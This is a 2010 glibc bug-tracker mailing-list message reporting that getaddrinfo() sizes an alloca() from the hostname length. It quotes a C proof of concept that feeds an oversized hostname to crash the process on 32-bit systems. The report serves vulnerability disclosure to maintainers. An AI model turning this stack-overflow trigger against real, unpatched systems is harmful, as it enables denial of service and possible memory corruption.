This is the mail archive of the
glibc-bugs@sourceware.org
mailing list for the glibc project.
[Bug libc/11884] Unbounded alloca() in node parameter of getaddrinfo()
- From: "cdn at chromium dot org" <sourceware-bugzilla at sourceware dot org>
- To: glibc-bugs at sources dot redhat dot com
- Date: 5 Aug 2010 05:14:15 -0000
- Subject: [Bug libc/11884] Unbounded alloca() in node parameter of getaddrinfo()
- References: <20100805051208.11884.cdn@chromium.org>
- Reply-to: sourceware-bugzilla at sourceware dot org
------- Additional Comments From cdn at chromium dot org 2010-08-05 05:14 -------
getaddra() should be getaddrinfo()... thats what I get for not proof reading.
(In reply to comment #0)
> getaddra() uses the provided node parameter to determine the size of an
> alloca(). When compiled without the -fstack-check option alloca() will be
> inlined as "SUB esp, size". For large values of size this can result in
several
> consequences which allow subsequent writes to the stack to overwrite arbitrary
> memory.
>
> The following POC can be used to demonstrate this vulnerability.
>
> #include <sys/mman.h>
> #include <sys/types.h>
> #include <sys/socket.h>
> #include <netdb.h>
>
> void main(int argc, char **argv) {
> struct addrinfo hints, *res;
> char serv[] = "";
> char *host;
> host = mmap(0, atoi(argv[1]), PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, 0, 0);
> memset(host, 0x41, atoi(argv[1]));
> host[atoi(argv[1]) - 1] = '\0';
> memset ((char *)&hints, 0, sizeof (hints));
> hints.ai_family = PF_INET;
> hints.ai_socktype = SOCK_STREAM;
> getaddrinfo(host, 0, &hints, &res);
> exit(0);
> }
>
> On a 32bit arch try values in the range of 9mb to demonstrate a crash.
--
http://sourceware.org/bugzilla/show_bug.cgi?id=11884
------- You are receiving this mail because: -------
You are on the CC list for the bug, or are watching someone who is.